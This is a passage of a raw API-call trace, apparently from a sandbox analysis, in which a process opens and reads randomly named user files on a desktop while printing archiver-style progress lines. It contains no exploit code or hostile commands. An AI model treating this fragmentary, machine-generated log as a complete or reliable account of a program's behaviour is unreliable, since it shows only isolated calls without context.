(_Str1=" 34% 16 + mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _Str2=" 35% 16 + mfZck7HwXf4SziBj\\z8HWZufZB7.jpg") returned -1 [0062.966] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.967] fputs (in: _Str=" 35% 16 + mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.968] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.968] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.968] free (_Block=0x1c89048) [0062.968] free (_Block=0x1c87ca8) [0062.968] CloseHandle (hObject=0xe8) returned 1 [0062.968] free (_Block=0x1c88fe8) [0062.969] SetEvent (hEvent=0xd4) returned 1 [0062.969] free (_Block=0x1c87c90) [0062.969] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.969] free (_Block=0x1c83e00) [0062.969] free (_Block=0x1c863e8) [0062.969] free (_Block=0x1c82ca0) [0062.969] free (_Block=0x0) [0062.969] free (_Block=0x0) [0062.969] free (_Block=0x0) [0062.970] malloc (_Size=0x8) returned 0x1c83e00 [0062.970] malloc (_Size=0x40) returned 0x1c84e20 [0062.970] free (_Block=0x1c83e00) [0062.970] malloc (_Size=0xc) returned 0x1c87c60 [0062.970] malloc (_Size=0x40) returned 0x1c84dd8 [0062.970] free (_Block=0x1c84e20) [0062.970] free (_Block=0x27fbf0) [0062.970] free (_Block=0x27fbe0) [0062.970] free (_Block=0x27fb60) [0062.970] free (_Block=0x1c85bb8) [0062.970] GetTickCount () returned 0x114731e [0062.970] malloc (_Size=0x60) returned 0x1c85bb8 [0062.970] free (_Block=0x0) [0062.970] malloc (_Size=0x1) returned 0x27fb60 [0062.970] free (_Block=0x0) [0062.970] malloc (_Size=0x4) returned 0x27fbe0 [0062.970] free (_Block=0x0) [0062.970] malloc (_Size=0x8) returned 0x27fbf0 [0062.970] malloc (_Size=0x18) returned 0x1c863e8 [0062.970] ResetEvent (hEvent=0xd0) returned 1 [0062.970] ResetEvent (hEvent=0xd4) returned 1 [0062.971] ResetEvent (hEvent=0xd8) returned 1 [0062.971] malloc (_Size=0x20) returned 0x1c82ca0 [0062.971] realloc (_Block=0x0, _Size=0xa) returned 0x1c87c90 [0062.971] wcscmp (_String1="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _String2="moG2C7rzW\\1VyHqT6C0o53edILQ.xls") returned -1 [0062.971] strlen (_Str="35") returned 0x2 [0062.971] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0062.971] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls", cchWideChar=31, lpMultiByteStr=0x1c82010, cbMultiByte=31, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls \r", lpUsedDefaultChar=0x22e760) returned 31 [0062.971] strcmp (_Str1=" 35% 16 + mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _Str2=" 35% 17 + moG2C7rzW\\1VyHqT6C0o53edILQ.xls") returned -1 [0062.971] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.972] fputs (in: _Str=" 35% 17 + moG2C7rzW\\1VyHqT6C0o53edILQ.xls", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.973] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.973] free (_Block=0x1c84e68) [0062.973] malloc (_Size=0x58) returned 0x1c88fe8 [0062.973] malloc (_Size=0x8) returned 0x1c83e30 [0062.973] malloc (_Size=0x8c) returned 0x1c89048 [0062.973] free (_Block=0x1c83e30) [0062.973] malloc (_Size=0x8c) returned 0x1c890e0 [0062.973] free (_Block=0x1c89048) [0062.973] malloc (_Size=0xc) returned 0x1c87cd8 [0062.973] malloc (_Size=0x8c) returned 0x1c89048 [0062.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\1VyHqT6C0o53edILQ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\1vyhqt6c0o53edilq.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.974] free (_Block=0x1c890e0) [0062.974] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xcacd, lpOverlapped=0x0) returned 1 [0062.976] SetEvent (hEvent=0xd4) returned 1 [0062.976] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.976] GetTickCount () returned 0x114732d [0062.976] strcmp (_Str1="+", _Str2="+") returned 0 [0062.976] wcscmp (_String1="moG2C7rzW\\1VyHqT6C0o53edILQ.xls", _String2="moG2C7rzW\\1VyHqT6C0o53edILQ.xls") returned 0 [0062.976] strlen (_Str="37") returned 0x2 [0062.976] strcmp (_Str1=" 37%", _Str2=" 35%") returned 1 [0062.976] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0062.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls", cchWideChar=31, lpMultiByteStr=0x1c82010, cbMultiByte=31, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\1VyHqT6C0o53edILQ.xls \r", lpUsedDefaultChar=0x22e868) returned 31 [0062.977] strcmp (_Str1=" 35% 17 + moG2C7rzW\\1VyHqT6C0o53edILQ.xls", _Str2=" 37% 17 + moG2C7rzW\\1VyHqT6C0o53edILQ.xls") returned -1 [0062.977] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.977] fputs (in: _Str=" 37% 17 + moG2C7rzW\\1VyHqT6C0o53edILQ.xls", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.978] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.978] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.979] free (_Block=0x1c89048) [0062.979] free (_Block=0x1c87cd8) [0062.979] CloseHandle (hObject=0xe8) returned 1 [0062.979] free (_Block=0x1c88fe8) [0062.979] SetEvent (hEvent=0xd4) returned 1 [0062.979] free (_Block=0x1c87cc0) [0062.979] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.981] free (_Block=0x1c83e20) [0062.981] free (_Block=0x1c86408) [0062.981] free (_Block=0x1c82ca0) [0062.981] free (_Block=0x0) [0062.981] free (_Block=0x0) [0062.981] free (_Block=0x0) [0062.981] malloc (_Size=0x8) returned 0x1c83e20 [0062.981] malloc (_Size=0x40) returned 0x1c84e68 [0062.981] free (_Block=0x1c83e20) [0062.981] malloc (_Size=0xc) returned 0x1c87c90 [0062.981] malloc (_Size=0x40) returned 0x1c84e20 [0062.981] free (_Block=0x1c84e68) [0062.981] free (_Block=0x27fbf0) [0062.982] free (_Block=0x27fbe0) [0062.982] free (_Block=0x27fb60) [0062.982] free (_Block=0x1c85bb8) [0062.982] GetTickCount () returned 0x114732d [0062.982] malloc (_Size=0x60) returned 0x1c85bb8 [0062.982] free (_Block=0x0) [0062.982] malloc (_Size=0x1) returned 0x27fb60 [0062.982] free (_Block=0x0) [0062.982] malloc (_Size=0x4) returned 0x27fbe0 [0062.982] free (_Block=0x0) [0062.982] malloc (_Size=0x8) returned 0x27fbf0 [0062.982] malloc (_Size=0x18) returned 0x1c86408 [0062.982] malloc (_Size=0x5c) returned 0x1c88fe8 [0062.982] realloc (_Block=0x0, _Size=0xa) returned 0x1c87cc0 [0062.982] strlen (_Str="37") returned 0x2 [0062.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\KYMLAaYO.ots", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0062.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\KYMLAaYO.ots", cchWideChar=22, lpMultiByteStr=0x1c82010, cbMultiByte=22, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\KYMLAaYO.ots \r", lpUsedDefaultChar=0x22e760) returned 22 [0062.982] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.983] fputs (in: _Str=" 37% 18 + moG2C7rzW\\KYMLAaYO.ots", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.984] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.984] free (_Block=0x1c86538) [0062.984] malloc (_Size=0x58) returned 0x1c89050 [0062.984] malloc (_Size=0x8) returned 0x1c83e50 [0062.984] malloc (_Size=0x7a) returned 0x1c890b0 [0062.984] free (_Block=0x1c83e50) [0062.984] malloc (_Size=0x7a) returned 0x1c89458 [0062.984] free (_Block=0x1c890b0) [0062.985] malloc (_Size=0xc) returned 0x1c87d08 [0062.985] malloc (_Size=0x7a) returned 0x1c890b0 [0062.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\KYMLAaYO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\kymlaayo.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.985] free (_Block=0x1c89458) [0062.985] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x4021, lpOverlapped=0x0) returned 1 [0062.987] SetEvent (hEvent=0xd4) returned 1 [0062.987] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.988] GetTickCount () returned 0x114733d [0062.988] strcmp (_Str1="+", _Str2="+") returned 0 [0062.988] wcscmp (_String1="moG2C7rzW\\KYMLAaYO.ots", _String2="moG2C7rzW\\KYMLAaYO.ots") returned 0 [0062.988] strlen (_Str="37") returned 0x2 [0062.988] strcmp (_Str1=" 37%", _Str2=" 37%") returned 0 [0062.988] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.988] free (_Block=0x1c890b0) [0062.988] free (_Block=0x1c87d08) [0062.988] CloseHandle (hObject=0xe8) returned 1 [0062.988] free (_Block=0x1c89050) [0062.988] SetEvent (hEvent=0xd4) returned 1 [0062.989] free (_Block=0x1c87cf0) [0062.989] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.989] malloc (_Size=0xb8) returned 0x1c89050 [0062.990] realloc (_Block=0x0, _Size=0xa) returned 0x1c87cf0 [0062.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\cj6gjc62rolrrp.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.990] free (_Block=0x1c891c0) [0062.990] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x902, lpOverlapped=0x0) returned 1 [0062.992] SetEvent (hEvent=0xd4) returned 1 [0062.992] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.992] GetTickCount () returned 0x114733d [0062.992] strcmp (_Str1="+", _Str2="+") returned 0 [0062.992] strlen (_Str="37") returned 0x2 [0062.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0062.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", cchWideChar=42, lpMultiByteStr=0x1c82010, cbMultiByte=42, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc\r", lpUsedDefaultChar=0x22e868) returned 42 [0062.992] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.993] fputs (in: _Str=" 37% 19 + moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.994] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.994] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.994] free (_Block=0x1c89110) [0062.995] free (_Block=0x1c87d38) [0062.995] CloseHandle (hObject=0xe8) returned 1 [0062.995] free (_Block=0x1c87f88) [0062.995] SetEvent (hEvent=0xd4) returned 1 [0062.995] free (_Block=0x1c87d20) [0062.995] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.048] free (_Block=0x1c83e60) [0063.048] free (_Block=0x1c86448) [0063.048] free (_Block=0x1c82ca0) [0063.048] free (_Block=0x0) [0063.049] free (_Block=0x0) [0063.049] free (_Block=0x0) [0063.049] malloc (_Size=0x8) returned 0x1c83e60 [0063.049] malloc (_Size=0x56) returned 0x1c87f88 [0063.049] free (_Block=0x1c83e60) [0063.049] malloc (_Size=0x1d) returned 0x1c82ca0 [0063.049] wcscmp (_String1="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", _String2="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc") returned 0 [0063.049] strlen (_Str="37") returned 0x2 [0063.049] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0063.050] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", cchWideChar=42, lpMultiByteStr=0x1c82010, cbMultiByte=42, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", lpUsedDefaultChar=0x22e9a8) returned 42 [0063.050] strcmp (_Str1=" 37% 19 + moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", _Str2=" 37% 20 + moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc") returned -1 [0063.050] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.051] fputs (in: _Str=" 37% 20 + moG2C7rzW\\PYHaTu2SZet-4\\cJ6GjC62RolRRP.doc", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.052] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.053] malloc (_Size=0x60) returned 0x1c85bb8 [0063.053] free (_Block=0x0) [0063.053] malloc (_Size=0x1) returned 0x27fb60 [0063.053] free (_Block=0x0) [0063.053] malloc (_Size=0x4) returned 0x27fbe0 [0063.053] free (_Block=0x0) [0063.053] malloc (_Size=0x8) returned 0x27fbf0 [0063.053] malloc (_Size=0x18) returned 0x1c862e8 [0063.053] ResetEvent (hEvent=0xd0) returned 1 [0063.053] ResetEvent (hEvent=0xd4) returned 1 [0063.053] ResetEvent (hEvent=0xd8) returned 1 [0063.053] malloc (_Size=0x20) returned 0x1c82e80 [0063.053] realloc (_Block=0x0, _Size=0xa) returned 0x1c87d20 [0063.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\eixfsun1f.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.054] free (_Block=0x1c89380) [0063.054] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x1384b, lpOverlapped=0x0) returned 1 [0063.057] SetEvent (hEvent=0xd4) returned 1 [0063.057] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.057] GetTickCount () returned 0x114737b [0063.057] strcmp (_Str1="+", _Str2="+") returned 0 [0063.057] strlen (_Str="40") returned 0x2 [0063.057] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0063.057] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi", cchWideChar=37, lpMultiByteStr=0x1c82010, cbMultiByte=37, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi \r", lpUsedDefaultChar=0x22e868) returned 37 [0063.057] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.058] fputs (in: _Str=" 40% 20 + moG2C7rzW\\PYHaTu2SZet-4\\eiXFsUN1f.avi", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.059] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.060] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.060] free (_Block=0x1c892e0) [0063.060] free (_Block=0x1c87d68) [0063.060] CloseHandle (hObject=0xe8) returned 1 [0063.060] free (_Block=0x1c87f88) [0063.060] SetEvent (hEvent=0xd4) returned 1 [0063.060] free (_Block=0x1c87d50) [0063.060] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.062] free (_Block=0x1c83e80) [0063.062] free (_Block=0x1c862c8) [0063.062] free (_Block=0x1c82e80) [0063.063] free (_Block=0x0) [0063.063] free (_Block=0x0) [0063.063] free (_Block=0x0) [0063.063] malloc (_Size=0x8) returned 0x1c83e80 [0063.063] malloc (_Size=0x4c) returned 0x1c82328 [0063.063] free (_Block=0x1c83e80) [0063.063] malloc (_Size=0xc) returned 0x1c87d20 [0063.063] malloc (_Size=0x4c) returned 0x1c822d0 [0063.063] free (_Block=0x1c82328) [0063.063] free (_Block=0x27fbf0) [0063.063] free (_Block=0x27fbe0) [0063.063] free (_Block=0x27fb60) [0063.063] free (_Block=0x1c85bb8) [0063.063] GetTickCount () returned 0x114737b [0063.063] malloc (_Size=0x60) returned 0x1c85bb8 [0063.063] free (_Block=0x0) [0063.063] malloc (_Size=0x1) returned 0x27fb60 [0063.063] free (_Block=0x0) [0063.064] malloc (_Size=0x4) returned 0x27fbe0 [0063.064] free (_Block=0x0) [0063.064] malloc (_Size=0x8) returned 0x27fbf0 [0063.064] malloc (_Size=0x18) returned 0x1c862c8 [0063.064] ResetEvent (hEvent=0xd0) returned 1 [0063.064] ResetEvent (hEvent=0xd4) returned 1 [0063.064] ResetEvent (hEvent=0xd8) returned 1 [0063.064] malloc (_Size=0x20) returned 0x1c82e80 [0063.064] realloc (_Block=0x0, _Size=0xa) returned 0x1c87d50 [0063.064] strlen (_Str="40") returned 0x2 [0063.064] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.064] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", cchWideChar=33, lpMultiByteStr=0x1c82010, cbMultiByte=33, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp \r", lpUsedDefaultChar=0x22e760) returned 33 [0063.064] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.065] fputs (in: _Str=" 40% 21 + moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.066] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.066] free (_Block=0x1c892e0) [0063.066] malloc (_Size=0x58) returned 0x1c87f88 [0063.066] malloc (_Size=0x8) returned 0x1c83eb0 [0063.066] malloc (_Size=0x90) returned 0x1c892e0 [0063.067] free (_Block=0x1c83eb0) [0063.067] malloc (_Size=0x90) returned 0x1c89378 [0063.067] free (_Block=0x1c892e0) [0063.067] malloc (_Size=0xc) returned 0x1c897c8 [0063.067] malloc (_Size=0x90) returned 0x1c892e0 [0063.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mog2c7rzw\\pyhatu2szet-4\\hmz8r.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0063.067] free (_Block=0x1c89378) [0063.067] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x185c2, lpOverlapped=0x0) returned 1 [0063.070] SetEvent (hEvent=0xd4) returned 1 [0063.070] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0063.070] GetTickCount () returned 0x114738b [0063.070] strcmp (_Str1="+", _Str2="+") returned 0 [0063.070] wcscmp (_String1="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", _String2="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp") returned 0 [0063.070] strlen (_Str="44") returned 0x2 [0063.070] strcmp (_Str1=" 44%", _Str2=" 40%") returned 1 [0063.071] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.071] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", cchWideChar=33, lpMultiByteStr=0x1c82010, cbMultiByte=33, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp \r", lpUsedDefaultChar=0x22e868) returned 33 [0063.071] strcmp (_Str1=" 40% 21 + moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", _Str2=" 44% 21 + moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp") returned -1 [0063.071] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.072] fputs (in: _Str=" 44% 21 + moG2C7rzW\\PYHaTu2SZet-4\\HMZ8R.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.073] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.073] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0063.073] free (_Block=0x1c892e0) [0063.073] free (_Block=0x1c897c8) [0063.073] CloseHandle (hObject=0xe8) returned 1 [0063.073] free (_Block=0x1c87f88) [0063.073] SetEvent (hEvent=0xd4) returned 1 [0063.073] free (_Block=0x1c87d80) [0063.074] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0063.077] free (_Block=0x1c83ea0) [0063.077] free (_Block=0x1c862a8) [0063.077] free (_Block=0x1c82e80) [0063.077] free (_Block=0x0) [0063.077] free (_Block=0x0) [0063.077] free (_Block=0x0) [0063.077] malloc (_Size=0x8) returned 0x1c83ea0 [0063.077] malloc (_Size=0x44) returned 0x1c87f88 [0063.077] free (_Block=0x1c83ea0) [0063.077] malloc (_Size=0xc) returned 0x1c87d50 [0063.078] malloc (_Size=0x44) returned 0x1c892e0 [0063.078] free (_Block=0x1c87f88) [0063.078] free (_Block=0x27fbf0) [0063.078] free (_Block=0x27fbe0) [0063.078] free (_Block=0x27fb60) [0063.078] free (_Block=0x1c85bb8) [0063.078] GetTickCount () returned 0x114738b [0063.078] malloc (_Size=0x60) returned 0x1c85bb8 [0063.078] free (_Block=0x0) [0063.078] malloc (_Size=0x1) returned 0x27fb60 [0063.078] free (_Block=0x0) [0063.078] malloc (_Size=0x4) returned 0x27fbe0 [0063.078] free (_Block=0x0) [0063.078] malloc (_Size=0x8) returned 0x27fbf0 [0063.078] malloc (_Size=0x18) returned 0x1c862a8 [0063.078] ResetEvent (hEvent=0xd0) returned 1 [0063.079] ResetEvent (hEvent=0xd4) returned 1 [0063.079] ResetEvent (hEvent=0xd8) returned 1 [0063.079] malloc (_Size=0x20) returned 0x1c82e80 [0063.079] realloc (_Block=0x0, _Size=0xa) returned 0x1c87d80 [0063.079] strlen (_Str="44") returned 0x2 [0063.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, 